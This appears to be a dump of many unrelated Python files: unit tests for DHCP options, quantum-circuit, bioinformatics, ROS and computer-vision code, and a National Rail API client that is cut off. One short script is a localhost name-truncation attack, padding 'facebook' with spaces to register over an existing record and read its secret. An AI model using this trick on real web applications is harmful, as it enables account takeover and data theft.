opt_list.insert(3, options.options.short_value_to_object(57, 2000))
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(57, 2000),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_insert4(self):
opt_list = self.gen_optionslist()
opt_list.insert(0, options.options.short_value_to_object(1, "255.255.255.0"))
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(1, "255.255.255.0"),
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 1500),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_insert5(self):
opt_list = self.gen_optionslist()
opt_list.insert(-1, options.options.short_value_to_object(1, "255.255.255.0"))
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 1500),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(1, "255.255.255.0"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_insert6(self):
opt_list = self.gen_optionslist()
opt_list.insert(5, options.options.short_value_to_object(1, "255.255.255.0"))
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 1500),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
options.options.short_value_to_object(1, "255.255.255.0"),
]
)
)
def test_OptionList_del1(self):
opt_list = self.gen_optionslist()
del opt_list[0]
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(57, 1500),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_del2(self):
opt_list = self.gen_optionslist()
del opt_list[-1]
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 1500),
options.options.short_value_to_object(60, "android-dhcp-9"),
options.options.short_value_to_object(12, "Galaxy-S9"),
]
)
)
def test_OptionList_del3(self):
opt_list = self.gen_optionslist()
del opt_list[2]
self.assertEqual(
opt_list,
options.OptionList(
[
options.options.short_value_to_object(61, {'hwtype': 1, 'hwaddr': "8c:45:00:1d:48:16"}),
options.options.short_value_to_object(57, 1500),
options.options.short_value_to_object(12, "Galaxy-S9"),
options.options.short_value_to_object(55, [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]),
]
)
)
def test_OptionList_len1(self):
self.assertEqual(
len(self.gen_optionslist()),
5
)
def test_OptionList_len2(self):
opt_list = self.gen_optionslist()
opt_list.insert(5, options.options.short_value_to_object(1, "255.255.255.0"))
opt_list.append(options.options.short_value_to_object(2, 3600))
del opt_list[5]
opt_list.append(options.options.short_value_to_object(1, "255.255.255.0"))
del opt_list[5]
self.assertEqual(
len(opt_list),
6
)
def test_OptionList_contains1(self):
self.assertEqual(
57 in self.gen_optionslist(),
True
)
def test_OptionList_contains2(self):
self.assertEqual(
1 in self.gen_optionslist(),
False
)
def test_OptionList_contains3(self):
self.assertEqual(
options.options.short_value_to_object(57, 1500) in self.gen_optionslist(),
True
)
def test_OptionList_contains4(self):
self.assertEqual(
options.options.short_value_to_object(2, 3600) in self.gen_optionslist(),
False
)
def test_OptionList_as_dict(self):
self.assertEqual(
self.gen_optionslist().as_dict(),
{'client_identifier': {'hwtype': 1, 'hwaddr': '8C:45:00:1D:48:16'}, 'max_dhcp_message_size': 1500, 'vendor_class_identifier': 'android-dhcp-9', 'hostname': 'Galaxy-S9', 'parameter_request_list': [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]}
)
def test_OptionList_json(self):
json_expected = (
'{\n "client_identifier": {\n "hwtype": 1,\n '
'"hwaddr": "8C:45:00:1D:48:16"\n },\n "max_dhcp_message_'
'size": 1500,\n "vendor_class_identifier": "android-dhcp-9"'
',\n "hostname": "Galaxy-S9",\n "parameter_request_list"'
': [\n 1,\n 3,\n 6,\n 15,\n '
' 26,\n 28,\n 51,\n 58,\n 59,\n '
' 43\n ]\n}'
)
self.assertEqual(
self.gen_optionslist().json,
json_expected
)
if __name__ == "__main__":
unittest.main()
| 12,534 | 4,657 |
"""Init file."""
from keras.legacy_tf_layers import migration_utils # pylint: disable=unused-import
| 102 | 35 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
def serialize(self, root: TreeNode) -> str:
"""Encodes a tree to a single string.
"""
def DFSPreorder(root):
return [root.val] + DFSPreorder(root.left) + DFSPreorder(root.right) if root else []
return ' '.join(map(str, DFSPreorder(root)))
def deserialize(self, data: str) -> TreeNode:
"""Decodes your encoded data to tree.
"""
if (data == ""):
return None
vals = [int(val) for val in data.split()]
counter = 0
def buildTree(minVal, maxVal):
nonlocal counter
if counter >= len(vals):
return None
if (vals[counter] < minVal or vals[counter] > maxVal):
return None
node = TreeNode(vals[counter])
counter += 1
node.left = buildTree(minVal, node.val)
node.right = buildTree(node.val, maxVal)
return node
return buildTree(float("-inf"), float("inf"))
# Your Codec object will be instantiated and called as such:
# Your Codec object will be instantiated and called as such:
# ser = Codec()
# deser = Codec()
# tree = ser.serialize(root)
# ans = deser.deserialize(tree)
# return ans | 1,485 | 431 |
import os
import sagemaker
from sagemaker import get_execution_role
from sagemaker.tensorflow.estimator import TensorFlow
sagemaker_session = sagemaker.Session()
# role = get_execution_role()
region = sagemaker_session.boto_session.region_name
training_input_path = "s3://intel-edge-poc/mask_dataset_datagen/train/"
validation_input_path = "s3://intel-edge-poc/mask_dataset_datagen/val/"
hyperparam = {
"save_model_dir": "s3://intel-edge-poc/saved/",
"batch_size": 32,
"epochs": 2,
"optimizer": "adam",
"learning_rate": 1e-3,
}
#'train_dir': 'mask_dataset_datagen/train/',
#'val_dir': 'mask_dataset_datagen/val/'
#'bucket' : 'intel-edge-poc',
tf_estimator = TensorFlow(
entry_point="TrainingJob.py",
role="intel-edge-poc-role",
instance_count=1,
instance_type="ml.c4.xlarge",
framework_version="2.3",
py_version="py37",
hyperparameters=hyperparam,
script_mode=True,
)
# tf_estimator.fit()
tf_estimator.fit({"training": training_input_path, "validation": validation_input_path})
| 1,038 | 398 |
import numpy as np
import skimage
import skimage.morphology as morph
import skimage.filters as filt
import skimage.exposure as expo
def get_corrected_image(iimage, gamma=0.25):
"""Return filtered image to detect spots."""
image = skimage.util.img_as_float(iimage)
image **= gamma
return image
| 314 | 107 |
# coding: utf-8
"""Test suite for our sysinfo utilities."""
# Copyright (c) yap_ipython Development Team.
# Distributed under the terms of the Modified BSD License.
import json
import nose.tools as nt
from yap_ipython.utils import sysinfo
def test_json_getsysinfo():
"""
test that it is easily jsonable and don't return bytes somewhere.
"""
json.dumps(sysinfo.get_sys_info())
| 398 | 129 |
from Pages.LoginPage import LoginPage
def test_invalid_login(setup):
login = LoginPage(setup)
login.enter_username_false()
login.enter_password_true()
login.click_login()
login.invalid_message_check()
print("Correct Login Test Completed")
| 268 | 84 |
from pyimagesearch.shapedetector import ShapeDetector
from pyimagesearch.colorlabeler import ColorLabeler
import argparse
import imutils
import numpy as np
import cv2
import argparse
import imutils
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
if face_cascade.empty(): raise Exception("your face_cascade is empty. are you sure, the path is correct ?")
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
if eye_cascade.empty(): raise Exception("your eye_cascade is empty. are you sure, the path is correct ?")
video = cv2.VideoCapture(0)
while(video.isOpened()):
ret, frame = video.read()
if frame is not None:
resized = imutils.resize(frame,width=600)
ratio=frame.shape[0] / float(resized.shape[0])
blurred = cv2.GaussianBlur(resized, (5, 5), 0)
gray = cv2.cvtColor(blurred, cv2.COLOR_BGR2GRAY)
lab = cv2.cvtColor(blurred, cv2.COLOR_BGR2LAB)
thresh = cv2.threshold(gray, 60, 255, cv2.THRESH_BINARY)[1]
# find contours in the thresholded image and initialize the
# shape detector
cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
sd = ShapeDetector()
cl = ColorLabeler()
# loop over the contours
for c in cnts:
# compute the center of the contour, then detect the name of the
# shape using only the contour
M = cv2.moments(c)
#cX = int((M["m10"] / M["m00"]) * ratio)
#cY = int((M["m01"] / M["m00"]) * ratio)
shape = sd.detect(c)
color = cl.label(lab, c)
print(shape)
print(color)
# multiply the contour (x, y)-coordinates by the resize ratio,
# then draw the contours and the name of the shape on the image
c = c.astype("float")
c *= ratio
c = c.astype("int")
cv2.drawContours(frame, [c], -1, (0, 255, 0), 2)
#cv2.putText(frame, shape, (cX, cY), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)
cv2.imshow('Video',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video.release()
cv2.destroyAllWindows()
| 2,040 | 863 |
#!/usr/bin/env python
s = [n * (3 * n - 1) / 2 for n in range(0, 10000)]
found = False
i = 1900
while not found:
i += 1
j = 1
while j < i:
# actually, we cannot guarentee that j < i, the real condition would
# be s[i] < 3 * j + 1, which is the distance of s[j] and s[j + 1]. But
# this one is too time consuming.
print i, j
if (s[i] + s[j]) in s and (2 * s[j] + s[i]) in s:
print 'found', i, j
found = True
break
else:
j += 1
print s[i]
| 548 | 215 |
"""
Module providing ML anonymization.
This module contains methods for anonymizing ML model training data, so that when
a model is retrained on the anonymized data, the model itself will also be considered
anonymous. This may help exempt the model from different obligations and restrictions
set out in data protection regulations such as GDPR, CCPA, etc.
The module contains methods that enable anonymizing training datasets in a manner that
is tailored to and guided by an existing, trained ML model. It uses the existing model's
predictions on the training data to train a second, anonymizer model, that eventually determines
the generalizations that will be applied to the training data. For more information about the
method see: https://arxiv.org/abs/2007.13086
Once the anonymized training data is returned, it can be used to retrain the model.
"""
from apt.anonymization.anonymizer import Anonymize
| 911 | 227 |
from qiskit import QuantumRegister,QuantumCircuit
from qiskit.aqua.operators import StateFn
from qiskit.aqua.operators import I
from qiskit_code.quantumMethod import add,ini
from qiskit_code.classicalMethod import Dec2Bi
def DeutschJozsa(l,method):
# Deutsch, D. and Jozsa, R., 1992. Rapid solution of problems by quantum computation.
# Proceedings of the Royal Society of London. Series A: Mathematical and Physical Sciences,
# 439(1907), pp.553-558.
# The input 'l' is the equivalent to the 'N' in the original paper of
# David Deutsch and Richard Jozsa, and 'method' denotes the 'unknown'
# function, if you input 'balanced' then it will be balanced and otherwise
# it will be constant.
qr0=QuantumRegister(l)
qr1=QuantumRegister(l+1)
# One qubit larger to carry.
ac=QuantumRegister(l) # Ancilla.
t0=QuantumRegister(1)
circ=QuantumCircuit(qr0,qr1,ac,t0)
circ.h(qr0)
if method=='balanced':
print('balanced oracle')
ini(circ,qr1,Dec2Bi(2**(l-1)))
else:
print('constant oracle')
ini(circ,qr1,Dec2Bi(0))
lst=range(l)
QIN1=[qr0[i] for i in lst]+[qr1[i] for i in range(l+1)]+[ac[i] for i in lst]
ADD=add(qr0,qr1,ac,l)
circ.append(ADD,QIN1)# Role of the U unitary
circ.cx(qr1[l],t0)# Role of the U unitary
circ.z(t0)# The S unitary.
circ.cx(qr1[l],t0)# Role of the U unitary
circ.append(ADD.inverse(),QIN1)# Role of the U unitary
psi=StateFn(circ)
phiReg0=QuantumRegister(l)
phiReg1=QuantumRegister(l+1)
phiReg2=QuantumRegister(l)
t1=QuantumRegister(1)
phiCirc=QuantumCircuit(phiReg0,phiReg1,phiReg2,t1)
phiCirc.h(phiReg0)
if method=='balanced':
ini(circ,qr1,Dec2Bi(2**(l-1)))
else:
ini(circ,qr1,Dec2Bi(0))
phi=StateFn(phiCirc)
operator=I.tensorpower(3*l+2)
expectation_value=(~psi@operator@phi).eval()
print(expectation_value)
#DeutschJozsa('constant')
#DeutschJozsa('balanced')
| 2,016 | 812 |
import requests
import random, string
x = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(16))
URL = "http://localhost/"
secret = "aA11111111" + x
# Registering a user
requests.post(url = "%s/add.php" % URL, data = {
'name': 'facebook' + ' '*64 + 'abc',
'secret': secret,
'description': 'desc',
})
r = requests.post(url = "%s/view.php" % URL, data = {
'name': 'facebook',
'secret': secret,
})
print(r.text)
| 480 | 188 |
import argparse
import sys
import traceback
from .app import Application
def new_excepthook(type, value, tb):
# by default, Qt does not seem to output any errors, this prevents that
traceback.print_exception(type, value, tb)
sys.excepthook = new_excepthook
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--no-gui', action='store_true')
args = parser.parse_args()
app = Application()
if args.no_gui:
app.calculation(3)
else:
from PyQt5.QtWidgets import QApplication
from .gui import MainWindow
qapp = QApplication(sys.argv)
gui = MainWindow(app)
gui.show()
sys.exit(qapp.exec_())
if __name__ == '__main__':
main()
| 737 | 241 |
from unittest import TestCase
from exercicios.ex1030 import calcula_suicidio
import random
class TestEx1030(TestCase):
def test_saida_com_erro_para_entradas_fora_do_intervalo(self):
chamada = [(0, 10), (10, 0), (10001, 10), (10, 1001)]
esperado = ("Case 1: entrada inválida\n"
"Case 2: entrada inválida\n"
"Case 3: entrada inválida\n"
"Case 4: entrada inválida\n")
retorno = calcula_suicidio(chamada)
self.assertEqual(esperado, retorno)
def test_saida_deve_retornar_case_1_3_para_entrada_5_2(self):
chamada = [(5, 2), (6, 3), (1234, 233)]
esperado = ("Case 1: 3\n"
"Case 2: 1\n"
"Case 3: 25\n")
retorno = calcula_suicidio(chamada)
self.assertEqual(esperado, retorno)
| 848 | 347 |
# -*- coding: utf-8 -*-
from json import load
from logging import basicConfig
from os.path import join, dirname
from pathlib import Path
################################################################################
# CHECKING THE INPUT AND OUTPUT AND DIRECTORY PATH
# INPUT
with open(join(Path(dirname(__file__)).parent.absolute(), "configuration.json")) as json_configuration_file:
CONFIG = load(json_configuration_file)
################################################################################
# SET LOG LEVEL
basicConfig(level=CONFIG['debugLevel'],
format="%(asctime)s [%(levelname)8s] %(message)s (%(filename)s:%(lineno)s)")
| 656 | 171 |
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Author: Lorand Cheng https://github.com/lorandcheng
# Date: Nov 15, 2020
# Project: USC EE250 Final Project, Morse Code Translator and Messenger
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import json
import requests
from datetime import datetime
from pprint import pprint
class messageHandler:
def __init__(self, name, serverAddress):
"""
Summary: Class that manages the HTTP interactions with the messaging server
Args:
name (string): Name of node
serverAddress (string): Target server to connect to in format ip_addr:port
"""
self.name = name
self.serverAddress = serverAddress
def sendMessage(self, message):
"""
Summary: Sends a POST message to the server
Args:
message (string): Content of the message
"""
headers = {
'Content-Type': 'application/json',
'Authorization': None # not using HTTP secure
}
payload = {
'sender': self.name,
'message': message,
'timestamp': datetime.now()
}
response = requests.post("http://{}/send-message".format(self.serverAddress),
headers=headers,
data=json.dumps(payload, indent=4, sort_keys=True, default=str))
if response.status_code == 200:
pprint(response.json())
return 1
else:
return 0
def getMessages(self,lastRead):
"""
Summary: Sends a GET message to the server
"""
params = {
'sender': self.name,
'lastRead': lastRead
}
return requests.get("http://{}/get-messages".format(self.serverAddress), params=params)
def getMessageHistory(self):
"""
Summary: Sends a GET message to the server
"""
params = {
'sender': self.name
}
return requests.get("http://{}/history".format(self.serverAddress), params=params)
| 2,177 | 620 |
# -*- coding: utf-8 -*-
import random
from random_words import RandomWords
from random_words import LoremIpsum
from django.core.management.base import BaseCommand
from app.models import Tag
from app.models import Post
class Command(BaseCommand):
def __init__(self):
super(Command, self).__init__()
self.rw = RandomWords()
self.li = LoremIpsum()
self.array_size = 2
def handle(self, *args, **options):
tags = []
for i in xrange(20000):
name = self.make_name()
tag, created = Tag.objects.get_or_create(name=name)
if created:
tags.append(tag)
print '{0} tags has been created.'.format(len(tags))
posts = []
tags_ids = Tag.objects.all().values_list('id', flat=True)
if self.array_size < len(tags_ids):
for i in xrange(100000):
name = self.make_name()
rand = random.sample(tags_ids, self.array_size)
post, created = Post.objects.get_or_create(
name=name,
defaults={
'tags': rand,
'description': self.li.get_sentences(5),
}
)
if created:
posts.append(post)
print '{0} posts has been created.'.format(len(posts))
else:
print 'Please generate more tags than {0}.'.format(self.array_size)
def make_name(self):
name = self.rw.random_word().capitalize()
name = '{0}{1}'.format(name, random.randint(1, 10))
return name
| 1,637 | 479 |
import numpy as np
import os
class Dataset():
def __init__(self, images, labels):
# convert from [0, 255] -> [0.0, 1.0]
images = images.astype(np.float32)
images = np.multiply(images, 1.0 / 255.0)
self._images = images
self._labels = labels
@property # getter
def images(self):
return self._images
@property
def labels(self):
return self._labels
def extract_images(image_dir, name):
files = open(os.path.join(image_dir, name), 'rb')
files.read(16)
buf = files.read(28 * 28 * 60000)
images = np.frombuffer(buf, dtype=np.uint8)
# images = images.reshape(-1, 784)
images = images.reshape(-1, 1, 28, 28)
return images
def extract_labels(image_dir, name):
files = open(os.path.join(image_dir, name), 'rb')
files.read(8)
buf = files.read(28 * 28 * 10000)
labels = np.frombuffer(buf, dtype=np.uint8)
return labels
def read_data_sets(image_dir):
class DataSets():
pass
data_sets = DataSets()
TRAIN_IMAGES = 'train-images-idx3-ubyte'
TRAIN_LABELS = 'train-labels-idx1-ubyte'
TEST_IMAGES = 't10k-images-idx3-ubyte'
TEST_LABELS = 't10k-labels-idx1-ubyte'
VALIDATION_SIZE = 5000
train_images = extract_images(image_dir, TRAIN_IMAGES)
train_labels = extract_labels(image_dir, TRAIN_LABELS)
train_images = train_images[VALIDATION_SIZE:]
train_labels = train_labels[VALIDATION_SIZE:]
validation_images = train_images[:VALIDATION_SIZE]
validation_labels = train_labels[:VALIDATION_SIZE]
test_images = extract_images(image_dir, TEST_IMAGES)
test_labels = extract_labels(image_dir, TEST_LABELS)
data_sets.train = Dataset(train_images, train_labels)
data_sets.validation = Dataset(validation_images, validation_labels)
data_sets.test = Dataset(test_images, test_labels)
return data_sets | 1,898 | 709 |
#!/usr/bin/env python
"""Waypoint Updater.
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO:
- Stopline location for each traffic light.
"""
import rospy
from geometry_msgs.msg import PoseStamped, TwistStamped
from styx_msgs.msg import Lane, Waypoint
from std_msgs.msg import Int32
import tf
from scipy.spatial import KDTree
import numpy as np
import math
LOOKAHEAD_WPS = 100 # Number of waypoints we will publish. You can change this number
MAX_DECEL = 1. # max. allowed deceleration
### Deceleration profile functions:
# Proposal by Udacity-walkthrough for deceleration profile:
def deceleration_sqrt(dist):
# x = 2 * MAX_DECEL * dist
x = 0.05 * MAX_DECEL * dist
vel = math.sqrt(x)
return vel
# Further scaling of profile will be necessary later (still untested, 30/03/2018)
def deceleration_sigmoid(dist):
x = dist
vel = 1/(1+math.exp(-x))
return vel
# Further scaling of profile will be necessary later (still untested 30/03/2018)
def deceleration_atan(dist):
x = dist - 10.
vel = math.atan(x) + 0.5 * math.pi
return vel
class WaypointUpdater(object):
def __init__(self):
rospy.init_node('waypoint_updater', log_level=rospy.DEBUG)
rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb) # Provides the Vehicles Current Position
rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb) # Provides a complete list of waypoints the car will be following
rospy.Subscriber('/traffic_waypoint', Int32, self.traffic_cb) # Get the position of the closest waypoint to a Red Light Stop
# TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below
self.final_waypoints_pub = rospy.Publisher('/final_waypoints', Lane, queue_size=1)
# TODO: Add other member variables you need below
self.current_pose = None
self.base_waypoints = None
self.waypoints_2d = None
self.waypoint_tree = None
self.stopline_wp_idx = -1
self.loop()
def loop(self):
rate = rospy.Rate(50) # 50Hz
while not rospy.is_shutdown():
# rospy.logdebug("current_pose: {}".format(self.current_pose is not None))
# rospy.logdebug("base_waypoints: {}".format(self.base_waypoints is not None))
# rospy.logdebug("waypoint_tree: {}".format(self.waypoint_tree is not None))
if self.current_pose is not None and self.base_waypoints is not None and self.waypoint_tree is not None:
#get closest waypoint
closest_waypoint_idx = self.get_closest_waypoint_idx()
self.publish_waypoints(closest_waypoint_idx)
rate.sleep()
def get_closest_waypoint_idx(self):
x = self.current_pose.pose.position.x
y = self.current_pose.pose.position.y
closest_idx = self.waypoint_tree.query([x,y],1)[1]
#check if closes waypoint is ahead or behind vehicle
closest_coord = self.waypoints_2d[closest_idx]
prev_coord = self.waypoints_2d[closest_idx-1]
# Equation for hyperplane through closest_coords
cl_vect = np.array(closest_coord)
prev_vect = np.array(prev_coord)
pos_vect = np.array([x, y])
val = np.dot(cl_vect - prev_vect, pos_vect - cl_vect)
if val > 0:
closest_idx = (closest_idx + 1) % len(self.waypoints_2d)
return closest_idx
def publish_waypoints(self, closest_idx):
lane = Lane()
lane.header = self.base_waypoints.header
farthest_idx = closest_idx + LOOKAHEAD_WPS
lane.waypoints = self.base_waypoints.waypoints[closest_idx:farthest_idx]
# Impose deceleration profile onto waypoints if traffic light is detected
# and within range (i.e. nearer than farthest_idx)
if self.stopline_wp_idx != -1 and (self.stopline_wp_idx < farthest_idx):
lane.waypoints = self.decelerate(lane.waypoints, closest_idx)
self.final_waypoints_pub.publish(lane)
# Imposes deceleration profile if traffic light or object is detected on trajectory
def decelerate(self, waypoints, closest_idx):
temp = []
for i, wp in enumerate(waypoints):
p = Waypoint()
p.pose = wp.pose
# Deceleration profile is a sqrt function
stop_idx = max(self.stopline_wp_idx - closest_idx - 1, 0) # Center of the car will be beind the line rather than right on
dist = self.distance(waypoints, i, stop_idx)
vel = deceleration_sqrt(dist)
# Alternative profile functions (try out later):
# vel = deceleration_sigmoid(dist)
# vel = deceleration_atan(dist)
if vel < 1.:
vel = 0.
p.twist.twist.linear.x = min(vel, wp.twist.twist.linear.x)
temp.append(p)
return temp
def pose_cb(self, msg):
self.current_pose = msg
def waypoints_cb(self, msg):
self.base_waypoints = msg
if not self.waypoints_2d:
self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y]
for waypoint in self.base_waypoints.waypoints]
self.waypoint_tree = KDTree(self.waypoints_2d)
def traffic_cb(self, msg):
# TODO: Callback for /traffic_waypoint message. Implement
self.stopline_wp_idx = msg.data;
# pass
def obstacle_cb(self, msg):
# TODO: Callback for /obstacle_waypoint message. We will implement it later
pass
def get_waypoint_velocity(self, waypoint):
return waypoint.twist.twist.linear.x
def set_waypoint_velocity(self, waypoints, waypoint, velocity):
waypoints[waypoint].twist.twist.linear.x = velocity
def distance(self, waypoints, wp1, wp2):
dist = 0
dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)
for i in range(wp1, wp2+1):
dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
wp1 = i
return dist
if __name__ == '__main__':
try:
WaypointUpdater()
except rospy.ROSInterruptException:
rospy.logerr('Could not start waypoint updater node.')
| 6,764 | 2,206 |
# renames duplicate columns by suffixing _1, _2 etc
class renamer():
def __init__(self):
self.d = dict()
def __call__(self, x):
if x not in self.d:
self.d[x] = 0
return x
else:
self.d[x] += 1
return "%s_%d" % (x, self.d[x])
| 305 | 107 |
'''
sbc-ngs (c) University of Manchester 2019
All rights reserved.
@author: neilswainston
'''
# pylint: disable=no-member
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
# pylint: disable=unused-argument
# pylint: disable=wrong-import-order
from __future__ import division
import os
import subprocess
import sys
import uuid
import multiprocessing as mp
import pandas as pd
from sbc_ngs import demultiplex, results, utils, vcf_utils
class PathwayAligner():
'''Class to align NGS data to pathways.'''
def __init__(self, out_dir, in_dir, seq_files, min_length, max_read_files):
# Initialise project directory:
self.__out_dir = out_dir
if not os.path.exists(self.__out_dir):
os.makedirs(self.__out_dir)
self.__in_dir = in_dir
self.__seq_files = seq_files
self.__min_length = min_length
self.__max_read_files = max_read_files
self.__barcodes, self.__barcodes_df = \
demultiplex.get_barcodes(os.path.join(in_dir, 'barcodes.csv'))
# Backwards compatibility:
self.__barcodes_df.rename(columns={'actual_ice_id': 'known_seq_id'},
inplace=True)
self.__barcodes_df['known_seq_id'] = \
self.__barcodes_df['known_seq_id'].astype(str)
# Index sequence / template files:
for templ_filename in self.__seq_files.values():
subprocess.call(['bwa', 'index', templ_filename])
def score_alignments(self, tolerance, num_threads):
'''Score alignments.'''
num_threads = num_threads if num_threads > 0 else mp.cpu_count()
print('Running pathway with %d threads' % num_threads)
barcode_reads = demultiplex.demultiplex(self.__barcodes,
self.__in_dir,
self.__min_length,
self.__max_read_files,
self.__out_dir,
tolerance=tolerance,
num_threads=num_threads)
write_queue = mp.Manager().Queue()
results_thread = results.ResultsThread(sorted(self.__seq_files.keys()),
self.__barcodes_df,
write_queue)
results_thread.start()
for barcodes, reads_filename in barcode_reads.items():
_score_alignment(self.__out_dir,
barcodes,
reads_filename,
self.__get_seq_files(barcodes),
num_threads,
write_queue)
# Update summary:
results_thread.close()
results_thread.write(self.__out_dir)
def __get_seq_files(self, barcodes):
'''Get appropriate sequence files.'''
try:
seq_id = self.__barcodes_df.loc[barcodes, 'known_seq_id']
if seq_id:
return {seq_id: self.__seq_files[seq_id]}
except KeyError:
print('Unexpected barcodes: ' + str(barcodes))
return {}
return self.__seq_files
def _get_barcode_seq(barcode_seq_filename):
'''Get barcode seq dict.'''
barcode_seq = pd.read_csv(barcode_seq_filename,
dtype={'barcode': str, 'seq_id': str}) \
if barcode_seq_filename else None
return barcode_seq.set_index('barcode')['seq_id'].to_dict()
def _score_alignment(dir_name, barcodes, reads_filename, seq_files,
num_threads, write_queue):
'''Score an alignment.'''
for seq_id, seq_filename in seq_files.items():
barcode_dir_name = utils.get_dir(dir_name, barcodes, seq_id)
bam_filename = os.path.join(barcode_dir_name, '%s.bam' % barcodes[2])
vcf_filename = bam_filename.replace('.bam', '.vcf')
prc = subprocess.Popen(('bwa', 'mem',
'-x', 'ont2d',
'-O', '6',
'-t', str(num_threads),
seq_filename, reads_filename),
stdout=subprocess.PIPE)
subprocess.check_output(('samtools', 'sort',
'-@%i' % num_threads,
'-o', bam_filename, '-'),
stdin=prc.stdout)
prc.wait()
# Generate and analyse variants file:
prc = subprocess.Popen(['samtools',
'mpileup',
'-uvf',
seq_filename,
'-t', 'DP',
'-o', vcf_filename,
bam_filename])
prc.communicate()
vcf_utils.analyse(vcf_filename, seq_id, barcodes, write_queue)
print('Scored: %s against %s' % (reads_filename, seq_id))
def _get_seq_files(filename):
'''Get seq files.'''
seq_files = {}
if os.path.isdir(filename):
for fle in os.listdir(filename):
name, ext = os.path.splitext(os.path.basename(fle))
if ext == '.fasta':
seq_files[name] = os.path.join(filename, fle)
else:
seq_files[os.path.splitext(os.path.basename(filename))[0]] = filename
return seq_files
def main(args):
'''main method.'''
seq_files = {}
for seq_file in args[6:]:
seq_files.update(_get_seq_files(seq_file))
aligner = PathwayAligner(out_dir=os.path.join(args[0], str(uuid.uuid4())),
in_dir=args[1],
seq_files=seq_files,
min_length=int(args[2]),
max_read_files=int(args[3]))
aligner.score_alignments(int(args[4]), num_threads=int(args[5]))
if __name__ == '__main__':
main(sys.argv[1:])
| 6,111 | 1,788 |
import argparse
from time import sleep
import requests
import xmltodict
# http://www.nationalrail.co.uk/100296.aspx
# https://lite.realtime.nationalrail.co.uk/OpenLDBWS/
# http://zetcode.com/db/sqlitepythontutorial/
from utils.database import insert_into_db, delete_where, execute_sql
xml_payload = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://thalesgroup.com/RTTI/2016-02-16/ldb/" xmlns:ns2="http://thalesgroup.com/RTTI/2013-11-28/Token/types">
<SOAP-ENV:Header>
<ns2:AccessToken>
<ns2:TokenValue>{KEY}</ns2:TokenValue>
</ns2:AccessToken>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:GetDepBoardWithDetailsRequest>
<ns1:numRows>12</ns1:numRows>
<ns1:crs>{CRS}</ns1:crs>
<ns1:timeWindow>120</ns1:timeWindow>
</ns1:GetDepBoardWithDetailsRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""
# url: The URL of the service
# key: Your National Rail API key
# crs: Station code (e.g. THA or PAD)
def fetch_trains(url, key, crs):
headers = {'content-type': 'text/xml'}
payload = xml_payload.replace("{KEY}", key).replace("{CRS}", crs)
response = requests.post(url, data=payload, headers=headers)
data = xmltodict.parse(response.content)
services = \
